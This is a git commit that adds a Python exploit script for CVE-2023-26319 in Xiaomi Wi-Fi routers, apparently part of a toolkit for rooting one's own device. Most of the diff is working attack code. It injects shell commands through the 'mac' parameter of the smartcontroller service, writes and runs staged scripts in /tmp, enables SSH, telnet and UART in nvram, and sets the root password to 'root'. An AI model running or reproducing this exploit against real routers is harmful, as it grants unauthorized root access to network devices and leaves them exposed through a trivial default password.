[connect5] Add new exploit "smartcontroller" for all devices (starting from R2100)

CVE-2023-26319: https://trust.mi.com/misrc/bulletins/advisory?cveId=536
Note: https://blog.thalium.re/posts/rooting-xiaomi-wifi-routers/
remittor 1 year ago
parent 1e0161f4c0
commit cecb78e35c

@ -30,25 +30,31 @@ if gw.status < 1:
die("Xiaomi Mi Wi-Fi device not found (IP: {})".format(gw.ip_addr))
dn = gw.device_name
from xqimage import get_modelid_by_name
model_id = get_modelid_by_name(dn)
if dn in 'R2100 R2350 RM1800 RM2100 RA67':
import connect2
#if dn in 'R2100 R2350 RM1800 RM2100 RA67':
# import connect2
# sys.exit(0)
if dn == 'R3600' and gw.rom_version == '1.0.17':
import connect2
#if dn == 'R3600' and gw.rom_version == '1.0.17':
# import connect2
# sys.exit(0)
if dn == 'RA70' and gw.rom_version.startswith('3.'):
import connect4
#if dn == 'RA70' and gw.rom_version.startswith('3.'):
# import connect4
# sys.exit(0)
if dn in 'R3600 RA69 RA70 RA72 RB03':
import connect3
#if dn in 'R3600 RA69 RA70 RA72 RB03':
# import connect3
# sys.exit(0)
#if dn in 'RA80 RA82 RB01 RB03 RB06 RB08':
# import connect4
# sys.exit(0)
if dn in 'RA80 RA82 RB01 RB03 RB06 RB08':
import connect4
if model_id < 0 or model_id >= get_modelid_by_name('R2100'):
import connect5
print("device_name =", gw.device_name)

@ -0,0 +1,300 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import sys
import time
import datetime
import types
import platform
import ctypes
import binascii
import re
import requests
import urllib
import json
from gateway import *
class ExploitError(Exception): pass
gw = Gateway(timeout = 4, detect_ssh = False)
if gw.status < 1:
die("Xiaomi Mi Wi-Fi device not found (IP: {})".format(gw.ip_addr))
print("device_name =", gw.device_name)
print("rom_version = {} {}".format(gw.rom_version, gw.rom_channel))
print("mac address = {}".format(gw.mac_address))
dn = gw.device_name
gw.ssh_port = 22
ret = gw.detect_ssh(verbose = 1, interactive = True)
if ret > 0:
die(0, "SSH server already installed and running")
ccode = gw.device_info["countrycode"]
if ccode == "CN":
print('CountryCode = CN')
stok = gw.web_login()
# CVE-2023-26319 Note: https://blog.thalium.re/posts/rooting-xiaomi-wifi-routers/
# cat /etc/smartcontroller/SmartTask.sc | hexdump -C
# rm /etc/smartcontroller/SmartTask.sc
# service smartcontroller restart
# echo "OK" > /tmp/ntp.status
// the `mac` parameter is user controlled
int32_t run_sysapi_macfilter(char* mac, int32_t wan_block)
char cmdbuf[100];
memset(&cmd_buffer, 0, 100);
char* const wan = (wan_block) ? "no" : "yes";
"/usr/sbin/sysapi macfilter set mac=%s wan=%s;/usr/sbin/sysapi macfilter commit",
// `mac` is directly injected into `system()`!
return run_cmd(&cmdbuf);
vuln_cmd = "/usr/sbin/sysapi macfilter set mac=;; wan=no;/usr/sbin/sysapi macfilter commit"
max_cmd_len = 100 - 1 - len(vuln_cmd)
def exec_smart_cmd(cmd, timeout = 7):
api = 'xqsmarthome/request_smartcontroller'
sc_command = cmd['command']
payload = json.dumps(cmd, separators = (',', ':'))
res = requests.post(gw.apiurl + api, data = { "payload": payload }, timeout = timeout)
except Exception as e:
msg = getattr(e, 'message', str(e))
raise ExploitError(f'Cannot send POST-request "{sc_command}" to SmartController service. {msg}')
return res.text
def reset_smart_task():
res = exec_smart_cmd( { "command": "reset_scenes" } )
dres = json.loads(res)
code = dres['code']
except Exception:
raise ExploitError(f'Error on parse response for command "reset_scenes" => {res}')
if code != 0:
raise ExploitError(f'Error on exec command "reset_scenes" => {res}')
return res
x_hour = 0
x_min = 0
def exec_tiny_cmd(cmd, act_delay = 0):
global x_hour, x_min
if len(cmd) > max_cmd_len:
raise ExploitError(f'Payload string line is too long (len = {len(cmd)}, max_len = {max_cmd_len})')
x_min += 1
if x_min == 60:
x_min = 0
x_hour += 1
if x_hour == 24:
x_hour = 0
# scene_setting + action_list + launch
pdata = {
"command": "scene_setting",
"name": f"it3_{x_hour}_{x_min}",
"action_list": [ {
"thirdParty": "xmrouter",
"delay": 17,
"type": "wan_block",
"payload": {
"command": "wan_block",
"mac": ";" + cmd + ";"
} ],
"launch": {
"timer": {
"time": f"{x_hour}:{x_min}",
"repeat": "0",
"enabled": True
res = exec_smart_cmd(pdata)
dres = json.loads(res)
code = dres['code']
except Exception:
raise ExploitError(f'Error on parse response for command "scene_setting" => {res}')
if code != 0:
raise ExploitError(f'Error on exec command "scene_setting" => {res}')
scene_id = dres['id']
#print("scene_id:", scene_id)
# scene_start_by_crontab
pdata = {
"command": "scene_start_by_crontab",
"time": f"{x_hour}:{x_min}",
"week": 0
res = exec_smart_cmd(pdata, timeout = 10)
dres = json.loads(res)
code = dres['code']
except Exception:
if res.find('504 Gateway Time-out') > 0 and act_delay > 0:
code = 0
raise ExploitError(f'Error on parse response for command "scene_start_by_crontab" => {res}')
if code != 0:
raise ExploitError(f'Error on exec command "scene_start_by_crontab" => {res}')
# scene_delete
pdata = { "command": "scene_delete", "id": scene_id }
res = exec_smart_cmd(pdata)
dres = json.loads(res)
code = dres['code']
except Exception:
raise ExploitError(f'Error on parse response for command "scene_delete" => {res}')
if code != 0:
raise ExploitError(f'Error on exec command "scene_delete" => {res}')
return res
def exec_cmd(command):
fn = '/tmp/e'
fcmd = 'echo -n "{txt}"{amode}{fn}'
flen = len(fcmd.format(txt="", amode="", fn=fn))
pos = 0
while True:
amode = ">" if pos == 0 else ">>"
txtlen = max_cmd_len - flen - len(amode)
txt = command[pos:pos+txtlen]
pos += len(txt)
if len(txt) == 0:
break # End of Command
if txt.find("'") >= 0 and txt.find('"') >= 0:
raise ExploitError(f'Incorrect shell command (1)')
fmt_cmd = fcmd
if txt.find('"') >= 0:
fmt_cmd = fcmd.replace('"', "'")
cmd = fmt_cmd.format(txt=txt, amode=amode, fn=fn)
exec_tiny_cmd(cmd, act_delay = 2)
exec_tiny_cmd(f"chmod +x {fn}", act_delay = 2)
exec_tiny_cmd(f"sh {fn}", act_delay = 5)
def get_dev_systime():
# response: {"time":{"min":32,"day":4,"index":0,"month":10,"year":2023,"sec":7,"hour":6,"timezone":"XXX"},"code":0}
res = requests.get(gw.apiurl + 'misystem/sys_time')
dres = json.loads(res.text)
code = dres['code']
except Exception:
raise ExploitError(f'Error on parse response for command "sys_time" => {res.text}')
if code != 0:
raise ExploitError(f'Error on get sys_time => {res.text}')
return dres['time']
def set_dev_systime(dst, year = 0, month = 0, day = 0, hour = 0, min = 0, sec = 0, timezone = ""):
if dst:
year = dst['year']
month = dst['month']
day = dst['day']
hour = dst['hour']
min = dst['min']
sec = dst['sec']
timezone = dst['timezone']
params = {
'time': f"{year}-{month}-{day} {hour}:{min}:{sec}",
'timezone': timezone
res = requests.get(gw.apiurl + 'misystem/set_sys_time', params = params)
dres = json.loads(res.text)
code = dres['code']
except Exception:
raise ExploitError(f'Error on parse response for command "set_sys_time" => {res.text}')
if code != 0:
raise ExploitError(f'Error on exec command "set_sys_time" => {res}')
return res.text
# get device orig system time
dst = get_dev_systime()
print('Disable alarm mode for smartcontroller service ...')
# echo "OK" > /tmp/ntp.status
res = set_dev_systime(dst)
#print('Change date ...')
#res = exec_tiny_cmd("date -s 203301020304")
#die('----- TEST FINISHED ------')
print('Wait smartcontroller activation ...')
sc_activated = False
start_time = datetime.datetime.now()
while datetime.datetime.now() - start_time <= datetime.timedelta(seconds = 32):
res = exec_tiny_cmd("date -s 203301020304", act_delay = 2)
except Exception:
except Exception:
print('============ smartcontroller failed ============')
dxt = get_dev_systime()
if dxt['year'] == 2033 and dxt['month'] == 1 and dxt['day'] == 2:
if dxt['hour'] == 3 and dxt['min'] == 4:
sc_activated = True
# restore orig system time
if not sc_activated:
die('Exploit not working!!!')
#print('Logger ...')
#res = exec_cmd("logger hello")
# $ tail -n 50 /tmp/messages
#die('----- TEST FINISHED ------')
print('Unlock dropbear service ...')
res = exec_cmd("sed -i 's/release/XXXXXX/g' /etc/init.d/dropbear")
print('Unlock SSH and TelNet servers ...')
res = exec_cmd("nvram set ssh_en=1; nvram set telnet_en=1; nvram set uart_en=1; nvram set boot_wait=on; nvram set bootdelay=3; nvram commit")
print('Set password for "root" user (password: "root") ...')
res = exec_cmd(r"echo -e 'root\nroot' | passwd root")
print('Enable dropbear service ...')
res = exec_cmd("/etc/init.d/dropbear enable")
print('Run SSH server on port 22 ...')
res = exec_cmd("/etc/init.d/dropbear restart")
print('Test SSH connection to port 22 ...')
gw.use_ssh = True
gw.passw = 'root'
ssh_en = gw.ping(verbose = 0, contimeout = 25) # RSA host key generate slowly!
if ssh_en:
print('#### SSH server are activated! ####')
print(f"WARNING: SSH server not responding (IP: {gw.ip_addr})")
if not ssh_en:
print('Run TelNet server on port 23 ...')
res = exec_cmd("/etc/init.d/telnet restart")
gw.use_ssh = False
telnet_en = gw.ping(verbose = 2)
print('#### TelNet server are activated! ####')